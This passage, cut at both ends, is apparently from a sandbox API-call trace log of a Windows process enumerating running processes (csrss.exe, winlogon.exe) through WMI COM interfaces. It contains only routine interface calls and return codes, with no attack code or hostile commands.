out: ppvObject=0x36ed54*=0x769008) returned 0x0 [0223.676] WbemDefPath:IUnknown:Release (This=0x7693e8) returned 0x0 [0223.676] WbemDefPath:IUnknown:QueryInterface (in: This=0x769008, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x769008) returned 0x0 [0223.676] WbemDefPath:IUnknown:QueryInterface (in: This=0x769008, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0223.677] WbemDefPath:IUnknown:AddRef (This=0x769008) returned 0x3 [0223.677] WbemDefPath:IUnknown:QueryInterface (in: This=0x769008, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0223.677] WbemDefPath:IUnknown:QueryInterface (in: This=0x769008, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0223.677] WbemDefPath:IUnknown:QueryInterface (in: This=0x769008, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x7694f8) returned 0x0 [0223.677] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7694f8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0223.677] WbemDefPath:IUnknown:Release (This=0x7694f8) returned 0x3 [0223.677] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0223.677] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0223.677] WbemDefPath:IUnknown:QueryInterface (in: This=0x769008, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0223.677] WbemDefPath:IUnknown:Release (This=0x769008) returned 0x2 [0223.677] WbemDefPath:IUnknown:Release (This=0x769008) returned 0x1 [0223.677] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0223.677] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0223.677] WbemDefPath:IUnknown:QueryInterface (in: This=0x769008, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x769008) returned 0x0 [0223.677] WbemDefPath:IUnknown:AddRef (This=0x769008) returned 0x3 [0223.677] WbemDefPath:IUnknown:Release (This=0x769008) returned 0x2 [0223.677] WbemDefPath:IWbemPath:SetText (This=0x769008, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"380\"") returned 0x0 [0223.677] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0223.678] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0223.678] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.678] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0223.678] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0223.678] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.678] IWbemClassObject:Get (in: This=0x5e8d550, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26de710*=0, plFlavor=0x26de714*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="csrss.exe", varVal2=0x0), pType=0x26de710*=8, plFlavor=0x26de714*=0) returned 0x0 [0223.678] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0223.678] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0223.678] IWbemClassObject:Get (in: This=0x5e8d550, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26de710*=8, plFlavor=0x26de714*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="csrss.exe", varVal2=0x0), pType=0x26de710*=8, plFlavor=0x26de714*=0) returned 0x0 [0223.678] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0223.678] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0223.678] CoTaskMemAlloc (cb=0x4) returned 0x5e89070 [0223.678] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89070, puReturned=0x26dde18 | out: apObjects=0x5e89070*=0x7492f8, puReturned=0x26dde18*=0x1) returned 0x0 [0223.715] IUnknown:QueryInterface (in: This=0x7492f8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x7492f8) returned 0x0 [0223.715] IUnknown:QueryInterface (in: This=0x7492f8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0223.715] IUnknown:QueryInterface (in: This=0x7492f8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0223.715] IUnknown:AddRef (This=0x7492f8) returned 0x3 [0223.715] IUnknown:QueryInterface (in: This=0x7492f8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0223.715] IUnknown:QueryInterface (in: This=0x7492f8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0223.715] IUnknown:QueryInterface (in: This=0x7492f8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x7492fc) returned 0x0 [0223.715] IMarshal:GetUnmarshalClass (in: This=0x7492fc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0223.716] IUnknown:Release (This=0x7492fc) returned 0x3 [0223.716] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0223.716] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0223.716] IUnknown:QueryInterface (in: This=0x7492f8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0223.716] IUnknown:Release (This=0x7492f8) returned 0x2 [0223.716] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0223.716] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0223.716] IUnknown:QueryInterface (in: This=0x7492f8, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x7492f8) returned 0x0 [0223.716] IUnknown:AddRef (This=0x7492f8) returned 0x4 [0223.716] IUnknown:Release (This=0x7492f8) returned 0x3 [0223.716] IUnknown:Release (This=0x7492f8) returned 0x2 [0223.716] CoTaskMemFree (pv=0x5e89070) [0223.716] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0223.716] IUnknown:AddRef (This=0x7492f8) returned 0x3 [0223.717] IWbemClassObject:Get (in: This=0x7492f8, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0223.717] IWbemClassObject:Get (in: This=0x7492f8, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"420\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0223.717] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"420\"") returned 0x64 [0223.717] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"420\"") returned 0x64 [0223.717] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0223.717] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0223.718] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0223.718] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0223.718] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e89070) returned 0x0 [0223.719] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89070, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0223.719] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89070, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x768d68) returned 0x0 [0223.719] WbemDefPath:IUnknown:Release (This=0x5e89070) returned 0x0 [0223.719] WbemDefPath:IUnknown:QueryInterface (in: This=0x768d68, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x768d68) returned 0x0 [0223.719] WbemDefPath:IUnknown:QueryInterface (in: This=0x768d68, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0223.719] WbemDefPath:IUnknown:AddRef (This=0x768d68) returned 0x3 [0223.720] WbemDefPath:IUnknown:QueryInterface (in: This=0x768d68, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0223.720] WbemDefPath:IUnknown:QueryInterface (in: This=0x768d68, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0223.720] WbemDefPath:IUnknown:QueryInterface (in: This=0x768d68, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e89080) returned 0x0 [0223.720] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e89080, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0223.720] WbemDefPath:IUnknown:Release (This=0x5e89080) returned 0x3 [0223.720] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0223.720] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0223.720] WbemDefPath:IUnknown:QueryInterface (in: This=0x768d68, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0223.720] WbemDefPath:IUnknown:Release (This=0x768d68) returned 0x2 [0223.720] WbemDefPath:IUnknown:Release (This=0x768d68) returned 0x1 [0223.720] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0223.720] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0223.720] WbemDefPath:IUnknown:QueryInterface (in: This=0x768d68, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x768d68) returned 0x0 [0223.720] WbemDefPath:IUnknown:AddRef (This=0x768d68) returned 0x3 [0223.720] WbemDefPath:IUnknown:Release (This=0x768d68) returned 0x2 [0223.720] WbemDefPath:IWbemPath:SetText (This=0x768d68, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"420\"") returned 0x0 [0223.720] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0223.720] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0223.720] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.721] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0223.721] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0223.721] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.721] IWbemClassObject:Get (in: This=0x7492f8, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26def80*=0, plFlavor=0x26def84*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winlogon.exe", varVal2=0x0), pType=0x26def80*=8, plFlavor=0x26def84*=0) returned 0x0 [0223.721] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0223.721] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0223.721] IWbemClassObject:Get (in: This=0x7492f8, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26def80*=8, plFlavor=0x26def84*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winlogon.exe", varVal2=0x0), pType=0x26def80*=8, plFlavor=0x26def84*=0) returned 0x0 [0223.721] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0223.721] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0223.721] CoTaskMemAlloc (cb=0x4) returned 0x5e890c0 [0223.721] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e890c0, puReturned=0x26dde18 | out: apObjects=0x5e890c0*=0x6d7a30, puReturned=0x26dde18*=0x1) returned 0x0 [0223.724] IUnknown:QueryInterface (in: This=0x6d7a30, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x6d7a30) returned 0x0 [0223.724] IUnknown:QueryInterface (in: This=0x6d7a30, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0223.724] IUnknown:QueryInterface (in: This=0x6d7a30, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0223.724] IUnknown:AddRef (This=0x6d7a30) returned 0x3 [0223.724] IUnknown:QueryInterface (in: This=0x6d7a30, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0223.724] IUnknown:QueryInterface (in: This=0x6d7a30, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0223.724] IUnknown:QueryInterface (in: This=0x6d7a30, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x6d7a34) returned 0x0 [0223.724] IMarshal:GetUnmarshalClass (in: This=0x6d7a34, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0223.724] IUnknown:Release (This=0x6d7a34) returned 0x3 [0223.724] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0223.725] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0223.725] IUnknown:QueryInterface (in: This=0x6d7a30, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0223.725] IUnknown:Release (This=0x6d7a30) returned 0x2 [0223.725] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0223.725] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0223.725] IUnknown:QueryInterface (in: This=0x6d7a30, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x6d7a30) returned 0x0 [0223.725] IUnknown:AddRef (This=0x6d7a30) returned 0x4 [0223.725] IUnknown:Release (This=0x6d7a30) returned 0x3 [0223.725] IUnknown:Release (This=0x6d7a30) returned 0x2 [0223.725] CoTaskMemFree (pv=0x5e890c0) [0223.725] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0223.725] IUnknown:AddRef (This=0x6d7a30) returned 0x3 [0223.725] IWbemClassObject:Get (in: This=0x6d7a30, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0223.726] IWbemClassObject:Get (in: This=0x6d7a30, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"912\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0223.726] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"912\"") returned 0x64 [0223.726] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"912\"") returned 0x64 [0223.726] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0223.726] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0223.726] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0223.726] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0223.727] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, 